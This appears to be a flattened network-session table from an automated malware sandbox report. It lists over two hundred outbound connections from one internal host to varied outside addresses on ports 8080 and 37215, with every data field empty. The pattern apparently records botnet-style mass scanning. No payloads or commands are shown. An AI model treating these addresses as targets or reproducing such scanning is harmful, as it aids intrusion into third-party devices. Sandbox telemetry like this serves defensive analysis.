                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32107192.168.2.233765817.53.205.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32108192.168.2.2350914133.168.131.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32109192.168.2.2354492218.180.55.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32110192.168.2.2352314181.46.210.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32111192.168.2.2344432112.204.238.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32112192.168.2.2342130199.240.45.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32113192.168.2.2341672193.40.183.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32114192.168.2.233864864.104.33.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32115192.168.2.2338912158.85.2.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32116192.168.2.233899634.32.43.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32117192.168.2.235979891.92.165.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32118192.168.2.235500466.129.64.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32119192.168.2.2355696206.194.55.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32120192.168.2.2358162117.247.221.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32121192.168.2.2353856201.14.144.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32122192.168.2.233286062.175.43.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32123192.168.2.2334200166.6.74.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32124192.168.2.233722057.211.118.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32125192.168.2.234653474.165.251.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32126192.168.2.23394608.49.47.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32127192.168.2.2355194159.12.127.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32128192.168.2.235119414.195.8.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32129192.168.2.2342246177.21.69.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32130192.168.2.2335962182.121.124.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32131192.168.2.2350844155.228.144.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32132192.168.2.2344890109.210.120.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32133192.168.2.2336614166.136.49.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32134192.168.2.2334274189.222.236.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32135192.168.2.234283085.81.98.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32136192.168.2.2349412186.254.65.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32137192.168.2.2334082169.62.220.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32138192.168.2.2337094172.15.203.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32139192.168.2.2345070145.57.86.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32140192.168.2.234352467.122.176.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32141192.168.2.2344074156.161.3.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32142192.168.2.235830072.229.124.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32143192.168.2.2340822184.14.157.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32144192.168.2.2360324151.41.231.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32145192.168.2.2343004157.232.8.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32146192.168.2.234096263.221.221.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32147192.168.2.2350484157.210.194.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32148192.168.2.2352196197.248.63.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32149192.168.2.235685825.2.201.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32150192.168.2.2360046157.13.161.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32151192.168.2.2352688157.163.77.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32152192.168.2.2334846197.153.99.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32153192.168.2.2339910197.166.197.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32154192.168.2.2356686157.179.230.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32155192.168.2.233715474.144.221.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32156192.168.2.2345350197.106.121.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32157192.168.2.2338202197.137.252.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32158192.168.2.2354560157.227.114.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32159192.168.2.2338546197.127.249.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32160192.168.2.2332836157.171.48.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32161192.168.2.2359566197.202.93.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32162192.168.2.2342754197.245.132.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32163192.168.2.2359534177.199.137.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32164192.168.2.2358522157.207.32.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32165192.168.2.2335224197.49.189.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32166192.168.2.2343468115.72.52.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32167192.168.2.2341976157.249.186.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32168192.168.2.234566040.127.85.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32169192.168.2.2344074197.82.15.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32170192.168.2.233789641.96.183.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32171192.168.2.233362841.92.86.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32172192.168.2.2357662197.160.149.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32173192.168.2.233669447.116.218.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32174192.168.2.234090641.199.210.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32175192.168.2.235018641.122.237.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32176192.168.2.2340992197.165.42.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32177192.168.2.2359622197.122.54.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32178192.168.2.2334650157.230.197.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32179192.168.2.234792041.176.103.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32180192.168.2.2357640157.36.253.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32181192.168.2.2354306157.15.183.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32182192.168.2.2351186197.7.3.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32183192.168.2.2334910197.193.160.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32184192.168.2.233635841.32.43.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32185192.168.2.2360646157.109.201.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32186192.168.2.235998845.60.84.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32187192.168.2.2341620197.18.40.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32188192.168.2.2338610157.193.115.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32189192.168.2.2348364157.46.208.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32190192.168.2.234763041.12.224.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32191192.168.2.234147641.66.166.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192192.168.2.2342774197.172.65.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32193192.168.2.235424641.237.18.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32194192.168.2.2337092197.0.0.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32195192.168.2.2339690197.230.232.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32196192.168.2.2345124197.204.7.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32197192.168.2.2341286209.236.6.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32198192.168.2.2342688197.236.214.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32199192.168.2.2337686157.199.38.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32200192.168.2.234081041.148.232.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32201192.168.2.235929641.201.137.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32202192.168.2.233695036.59.93.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32203192.168.2.2346008212.86.73.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32204192.168.2.235268441.219.44.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32205192.168.2.2357040197.123.83.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32206192.168.2.2358206157.76.172.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32207192.168.2.233770241.112.194.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32208192.168.2.2356320157.141.198.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32209192.168.2.234091692.165.206.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32210192.168.2.2342584197.251.56.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32211192.168.2.2334070157.79.170.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32212192.168.2.235436841.100.235.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32213192.168.2.2357572197.26.175.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32214192.168.2.236071642.40.213.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32215192.168.2.2352936165.72.134.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32216192.168.2.235816041.162.116.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32217192.168.2.234569841.89.124.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32218192.168.2.235695041.79.110.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32219192.168.2.2342282157.38.56.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32220192.168.2.234212241.5.214.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32221192.168.2.2341478197.180.8.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32222192.168.2.2333976157.124.104.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32223192.168.2.2344594157.215.141.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32224192.168.2.2343322114.149.218.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32225192.168.2.2336306157.149.102.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32226192.168.2.2356498157.229.128.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32227192.168.2.234628641.70.141.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32228192.168.2.2342470157.5.206.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32229192.168.2.2354398197.250.68.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32230192.168.2.2358640157.114.246.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32231192.168.2.2333114157.135.110.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32232192.168.2.234407841.121.196.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32233192.168.2.2342986197.235.79.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32234192.168.2.2348604197.218.26.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32235192.168.2.233715641.46.54.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32236192.168.2.235518041.193.107.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32237192.168.2.2334468197.86.124.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32238192.168.2.233821641.201.162.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32239192.168.2.2346870157.31.159.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32240192.168.2.234859041.144.68.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32241192.168.2.234152041.223.63.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32242192.168.2.2344420197.43.150.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32243192.168.2.2357772170.10.199.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32244192.168.2.2354922157.135.232.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32245192.168.2.2334988197.15.221.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32246192.168.2.2348068164.253.73.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32247192.168.2.235465041.223.107.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32248192.168.2.2347720197.197.227.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32249192.168.2.2354358157.186.119.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32250192.168.2.233357841.249.3.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32251192.168.2.2350964197.225.60.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32252192.168.2.2334346197.158.41.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32253192.168.2.235683641.176.97.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32254192.168.2.2334904157.222.129.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32255192.168.2.2348478110.2.92.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32256192.168.2.234402641.1.91.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32257192.168.2.2349052197.17.105.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32258192.168.2.2340756197.59.164.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32259192.168.2.235147841.98.112.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32260192.168.2.2352998197.239.3.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32261192.168.2.2354374157.144.86.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32262192.168.2.2353244157.27.39.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32263192.168.2.234539441.149.53.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32264192.168.2.235005441.29.221.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32265192.168.2.2339332197.19.219.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32266192.168.2.2347026157.83.136.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32267192.168.2.2339884197.128.134.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32268192.168.2.233475041.74.79.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32269192.168.2.233973441.220.34.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32270192.168.2.2332874157.233.219.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32271192.168.2.2352280197.38.207.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32272192.168.2.2354300157.179.238.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32273192.168.2.2339374145.8.55.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32274192.168.2.235550241.33.173.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32275192.168.2.2350672161.9.151.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32276192.168.2.2333484197.132.97.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32277192.168.2.235929041.153.145.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32278192.168.2.2348174197.14.158.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32279192.168.2.235584441.165.141.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32280192.168.2.2350822197.170.140.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32281192.168.2.2359178108.242.94.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32282192.168.2.2356292197.32.230.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32283192.168.2.235158041.249.121.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32284192.168.2.2333646157.43.191.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32285192.168.2.234642842.201.189.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32286192.168.2.234717441.220.127.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32287192.168.2.234725841.192.14.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32288192.168.2.2335238157.123.179.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32289192.168.2.2333582197.180.45.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32290192.168.2.234853212.227.214.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32291192.168.2.2357136197.208.200.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32292192.168.2.2348496100.55.212.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32293192.168.2.2347696169.234.254.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32294192.168.2.2338782219.215.45.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32295192.168.2.2334490197.170.200.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32296192.168.2.233343441.29.176.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32297192.168.2.2338162157.154.237.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32298192.168.2.2344876191.171.73.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32299192.168.2.2344676197.59.236.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32300192.168.2.235763641.21.135.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32301192.168.2.2335948157.194.45.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32302192.168.2.235786277.136.22.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32303192.168.2.2347450197.25.45.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32304192.168.2.2343778157.37.125.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32305192.168.2.234044441.255.156.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32306192.168.2.235708041.205.65.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32307192.168.2.2334964140.176.124.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32308192.168.2.234721441.148.194.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32309192.168.2.233798841.199.41.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32310192.168.2.233945666.94.76.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32311192.168.2.2337728157.40.200.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32312192.168.2.2348904197.241.25.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32313192.168.2.2347658195.200.209.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32314192.168.2.2340010109.136.41.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32315192.168.2.234293641.15.133.10237215
                                                        TimestampBytes transferredDirectionData


